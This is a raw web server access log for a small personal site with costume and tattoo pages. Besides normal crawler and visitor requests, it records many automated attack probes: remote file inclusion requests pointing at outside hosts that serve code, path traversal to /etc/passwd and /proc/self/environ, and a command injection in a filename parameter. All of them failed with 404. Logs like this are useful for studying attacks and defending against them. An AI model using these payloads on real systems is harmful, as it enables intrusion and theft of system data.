65.60.41.26 - - [11/May/2010:06:57:32 -0500] "GET /logs/access_log.1265760000//init.poll.php?include_class=http://www.pyungsan.or.kr/bbs/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
65.60.41.26 - - [11/May/2010:06:57:41 -0500] "GET /logs/access_log.1265760000//init.poll.php?include_class=http://www.pyungsan.or.kr/bbs/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
65.60.41.26 - - [11/May/2010:06:57:41 -0500] "GET /logs//init.poll.php?include_class=http://www.pyungsan.or.kr/bbs/id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
65.60.41.26 - - [11/May/2010:06:57:41 -0500] "GET //init.poll.php?include_class=http://www.pyungsan.or.kr/bbs/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
65.60.41.26 - - [11/May/2010:06:57:41 -0500] "GET /logs/access_log.1262476800//init.poll.php?include_class=http://www.pyungsan.or.kr/bbs/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
87.250.255.243 - - [11/May/2010:07:00:40 -0500] "GET /costume/thmb9.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
210.109.102.158 - - [11/May/2010:07:03:17 -0500] "GET /logs/access_log.1245456000/errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
210.109.102.158 - - [11/May/2010:07:03:17 -0500] "GET //errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
210.109.102.158 - - [11/May/2010:07:03:18 -0500] "GET /logs//errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
210.109.102.158 - - [11/May/2010:07:03:34 -0500] "GET /logs/access_log.1243728000/errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
210.109.102.158 - - [11/May/2010:07:03:35 -0500] "GET /logs/access_log.1225929600/errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
174.133.197.114 - - [11/May/2010:07:05:16 -0500] "GET /logs/access_log.1273190400/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.834"
174.133.197.114 - - [11/May/2010:07:05:16 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
174.133.197.114 - - [11/May/2010:07:05:16 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
174.133.197.114 - - [11/May/2010:07:05:17 -0500] "GET /logs/access_log.1273190400/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.834"
174.133.197.114 - - [11/May/2010:07:05:17 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
174.133.197.114 - - [11/May/2010:07:05:17 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
218.149.84.14 - - [11/May/2010:07:07:34 -0500] "GET /module_db.php?pivot_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
218.149.84.14 - - [11/May/2010:07:07:34 -0500] "GET /module_db.php?pivot_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
218.149.84.14 - - [11/May/2010:07:07:34 -0500] "GET /logs/module_db.php?pivot_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
218.149.84.14 - - [11/May/2010:07:07:34 -0500] "GET /logs/access_log.1263081600/module_db.php?pivot_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
218.149.84.14 - - [11/May/2010:07:07:34 -0500] "GET /logs/access_log.1263081600/module_db.php?pivot_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
218.149.84.14 - - [11/May/2010:07:07:34 -0500] "GET /logs/module_db.php?pivot_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
218.149.84.14 - - [11/May/2010:07:07:41 -0500] "GET /logs/access_log.1266537600/module_db.php?pivot_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
218.149.84.14 - - [11/May/2010:07:07:42 -0500] "GET /logs/access_log.1266537600/module_db.php?pivot_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
216.129.119.14 - - [11/May/2010:07:08:21 -0500] "GET /logs/access_log.1224288000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
211.236.43.200 - - [11/May/2010:07:08:26 -0500] "GET //*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 290 "-""libwww-perl/5.805"
174.36.1.97 - - [11/May/2010:07:16:32 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
216.129.119.42 - - [11/May/2010:07:16:42 -0500] "GET /logs/access_log.1225929600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.250.255.243 - - [11/May/2010:07:16:49 -0500] "GET /logs/access_log.1238889600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.218.116.132 - - [11/May/2010:07:20:34 -0500] "GET /logs/?D=D HTTP/1.1" 200 5130 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
77.221.130.20 - - [11/May/2010:07:22:47 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
77.221.130.20 - - [11/May/2010:07:22:47 -0500] "GET /logs/access_log.1217376000//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
77.221.130.20 - - [11/May/2010:07:22:47 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
89.163.148.130 - - [11/May/2010:07:23:11 -0500] "GET /logs/access_log.1217376000//s_loadenv.inc.php?DOCUMENT_ROOT=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
89.163.148.130 - - [11/May/2010:07:23:11 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
89.163.148.130 - - [11/May/2010:07:23:11 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
78.110.50.139 - - [11/May/2010:07:23:13 -0500] "GET /logs/access_log.1217376000//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
78.110.50.139 - - [11/May/2010:07:23:13 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
78.110.50.139 - - [11/May/2010:07:23:13 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
78.110.50.139 - - [11/May/2010:07:23:13 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
78.110.50.139 - - [11/May/2010:07:23:13 -0500] "GET /logs/access_log.1217376000//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
78.110.50.139 - - [11/May/2010:07:23:13 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
89.163.148.130 - - [11/May/2010:07:23:36 -0500] "GET /logs/access_log.1217376000//s_loadenv.inc.php?DOCUMENT_ROOT=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
89.163.148.130 - - [11/May/2010:07:23:36 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
89.163.148.130 - - [11/May/2010:07:23:36 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
206.212.244.82 - - [11/May/2010:07:23:51 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
206.212.244.82 - - [11/May/2010:07:23:51 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
206.212.244.82 - - [11/May/2010:07:23:51 -0500] "GET /logs/access_log.1217376000//s_loadenv.inc.php?DOCUMENT_ROOT=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
174.36.1.97 - - [11/May/2010:07:25:30 -0500] "GET /logs/access_log.1273190400/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
174.36.1.97 - - [11/May/2010:07:25:31 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
174.36.1.97 - - [11/May/2010:07:25:31 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
211.236.43.200 - - [11/May/2010:07:27:38 -0500] "GET //*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 290 "-""libwww-perl/5.805"
87.250.255.243 - - [11/May/2010:07:32:57 -0500] "GET /logs/access_log.1201392000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
220.181.7.48 - - [11/May/2010:07:33:10 -0500] "GET / HTTP/1.1" 200 1003 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
207.7.108.203 - - [11/May/2010:07:33:25 -0500] "GET /logs/main.cgi?down_num=5466654&board=rebarz99&command=down_load&filename=pizzyisgay.txt%7Cecho%20v0pCr3w%3Bid%3Buname%7C HTTP/1.1" 404 297 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
207.7.108.203 - - [11/May/2010:07:33:25 -0500] "GET /main.cgi?down_num=5466654&board=rebarz99&command=down_load&filename=pizzyisgay.txt%7Cecho%20v0pCr3w%3Bid%3Buname%7C HTTP/1.1" 404 292 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
212.47.221.153 - - [11/May/2010:07:34:01 -0500] "GET /logs/*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.812"
212.47.221.153 - - [11/May/2010:07:34:01 -0500] "GET /*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.812"
212.47.221.153 - - [11/May/2010:07:34:03 -0500] "GET /logs/*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.812"
212.47.221.153 - - [11/May/2010:07:34:04 -0500] "GET /*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.812"
87.250.255.243 - - [11/May/2010:07:35:29 -0500] "GET /logs/access_log.1249344000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
78.110.50.139 - - [11/May/2010:07:37:02 -0500] "GET /logs/access_log.1217376000%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
78.110.50.139 - - [11/May/2010:07:37:28 -0500] "GET /logs/access_log.1217376000%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
95.83.35.230 - - [11/May/2010:07:38:42 -0500] "GET /costume/ HTTP/1.1" 200 640 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
95.83.35.230 - - [11/May/2010:07:38:45 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
87.250.255.243 - - [11/May/2010:07:39:46 -0500] "GET /logs/access_log.1259452800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
206.212.244.82 - - [11/May/2010:07:39:50 -0500] "GET /logs/access_log.1217376000%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
66.249.71.138 - - [11/May/2010:07:40:50 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.138 - - [11/May/2010:07:40:50 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
210.109.102.158 - - [11/May/2010:07:41:28 -0500] "GET /errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
210.109.102.158 - - [11/May/2010:07:41:30 -0500] "GET //errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
91.103.220.36 - - [11/May/2010:07:44:54 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 339 "-""libwww-perl/5.79"
91.103.220.36 - - [11/May/2010:07:44:54 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 334 "-""libwww-perl/5.79"
111.89.128.186 - - [11/May/2010:07:45:57 -0500] "GET //include/monitoring/engine/errors.php?error=http://gyhu.interfree.it/id.jpg?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
111.89.128.186 - - [11/May/2010:07:45:59 -0500] "GET /logs//include/monitoring/engine/errors.php?error=http://gyhu.interfree.it/id.jpg?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
89.163.148.130 - - [11/May/2010:07:46:05 -0500] "GET /logs/access_log.1217376000%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
89.163.148.130 - - [11/May/2010:07:46:09 -0500] "GET /logs/access_log.1217376000%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
88.80.206.4 - - [11/May/2010:07:46:53 -0500] "GET /logs//admin/auth.php?xcart_dir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
88.80.206.4 - - [11/May/2010:07:46:53 -0500] "GET /logs/access_log.1263859200//admin/auth.php?xcart_dir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
88.80.206.4 - - [11/May/2010:07:46:53 -0500] "GET //admin/auth.php?xcart_dir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
88.80.206.4 - - [11/May/2010:07:47:08 -0500] "GET /logs/access_log.1264377600//admin/auth.php?xcart_dir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
194.108.112.112 - - [11/May/2010:07:48:32 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sle.ro/a??? HTTP/1.1" 404 339 "-""libwww-perl/5.79"
194.108.112.112 - - [11/May/2010:07:48:33 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sle.ro/a??? HTTP/1.1" 404 334 "-""libwww-perl/5.79"
217.172.150.13 - - [11/May/2010:07:48:38 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sle.ro/a??? HTTP/1.1" 404 339 "-""libwww-perl/5.825"
217.172.150.13 - - [11/May/2010:07:48:38 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sle.ro/a??? HTTP/1.1" 404 334 "-""libwww-perl/5.825"
95.83.35.230 - - [11/May/2010:07:50:12 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "http://tomdolan.pconline.com/costume/""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
95.83.35.230 - - [11/May/2010:07:50:13 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
95.83.35.230 - - [11/May/2010:07:50:13 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
95.83.35.230 - - [11/May/2010:07:50:14 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
95.83.35.230 - - [11/May/2010:07:50:14 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
111.89.128.186 - - [11/May/2010:07:50:16 -0500] "GET //include/monitoring/engine/errors.php?error=http://gyhu.interfree.it/id.jpg?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
111.89.128.186 - - [11/May/2010:07:50:16 -0500] "GET /logs//include/monitoring/engine/errors.php?error=http://gyhu.interfree.it/id.jpg?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
210.50.189.221 - - [11/May/2010:07:50:22 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sle.ro/a??? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
210.50.189.221 - - [11/May/2010:07:50:22 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sle.ro/a??? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
212.74.26.3 - - [11/May/2010:07:55:32 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "http://www.google.co.uk/search?hl=en&q=bert+grimm+flash&aq=1sx&aqi=g-sx5&aql=&oq=bertgrimm+&gs_rfai=""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
212.74.26.3 - - [11/May/2010:07:55:32 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "http://www.google.co.uk/search?hl=en&q=bert+grimm+flash&aq=1sx&aqi=g-sx5&aql=&oq=bertgrimm+&gs_rfai=""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
212.74.26.3 - - [11/May/2010:07:55:32 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
212.74.26.3 - - [11/May/2010:07:55:32 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
212.74.26.3 - - [11/May/2010:07:55:32 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
212.74.26.3 - - [11/May/2010:07:55:33 -0500] "GET /tattoo/tat10.jpg HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
212.74.26.3 - - [11/May/2010:07:55:36 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
212.74.26.3 - - [11/May/2010:07:55:39 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
212.74.26.3 - - [11/May/2010:07:55:39 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
212.74.26.3 - - [11/May/2010:07:55:39 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
212.74.26.3 - - [11/May/2010:07:55:40 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
212.74.26.3 - - [11/May/2010:07:55:40 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
212.74.26.3 - - [11/May/2010:07:55:40 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
212.74.26.3 - - [11/May/2010:07:55:41 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
212.74.26.3 - - [11/May/2010:07:55:41 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
212.74.26.3 - - [11/May/2010:07:55:41 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
212.74.26.3 - - [11/May/2010:07:55:48 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
212.74.26.3 - - [11/May/2010:07:55:48 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
212.74.26.3 - - [11/May/2010:07:55:48 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
212.74.26.3 - - [11/May/2010:07:55:49 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
212.74.26.3 - - [11/May/2010:07:55:49 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
212.74.26.3 - - [11/May/2010:07:55:49 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
212.74.26.3 - - [11/May/2010:07:55:50 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
212.74.26.3 - - [11/May/2010:07:55:51 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
212.74.26.3 - - [11/May/2010:07:55:51 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
212.74.26.3 - - [11/May/2010:07:55:51 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
212.74.26.3 - - [11/May/2010:07:55:51 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
212.74.26.3 - - [11/May/2010:07:56:09 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
